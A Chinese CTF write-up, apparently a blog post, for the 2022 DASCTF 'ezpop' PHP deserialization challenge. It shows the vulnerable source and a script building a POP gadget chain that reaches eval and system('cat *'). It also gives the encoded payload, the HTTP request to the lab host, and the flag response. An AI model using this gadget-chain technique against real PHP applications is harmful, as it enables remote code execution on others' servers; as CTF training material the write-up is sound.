CTF做题笔记8

[2022DASCTF]ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}


$a = new fin();
$a->f1 = new what();
$a->f1->a = new mix();
$a->f1->a->m1 = new crow();
$a->f1->a->m1->v1 = new fin();
$a->f1->a->m1->v1->f1 = new mix();
// $a->f1->a->m1->v1->f1 ->m1 = "\n print_r(scandir(dirname(__FILE__)));";
$a->f1->a->m1->v1->f1->m1 = "\n system('cat *');";
echo serialize($a);
?>
O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:18:"
 system('cat *');";}}s:2:"v2";N;}}}}
%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a
POST / HTTP/1.1
Host: d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Length: 535
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://d2a67562-b05a-4c09-a308-a7b7e9fb4bdc.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17fbfc9d0df1596-08ef2a13d1d96a-14281e05-384000-17fbfc9d0e014a0
Connection: close

cmd=%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%34%3a%22%77%68%61%74%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%4f%3a%34%3a%22%63%72%6f%77%22%3a%32%3a%7b%73%3a%32%3a%22%76%31%22%3b%4f%3a%33%3a%22%66%69%6e%22%3a%31%3a%7b%73%3a%32%3a%22%66%31%22%3b%4f%3a%33%3a%22%6d%69%78%22%3a%31%3a%7b%73%3a%32%3a%22%6d%31%22%3b%73%3a%31%38%3a%22%0a%20%73%79%73%74%65%6d%28%27%63%61%74%20%2a%27%29%3b%22%3b%7d%7d%73%3a%32%3a%22%76%32%22%3b%4e%3b%7d%7d%7d%7d%0a
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 27 Mar 2022 06:10:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.28
Content-Length: 1424

not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.congratulations!
<?php

//flag{5ea0ff6e-3160-49f4-9a92-a5137e51db3d}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值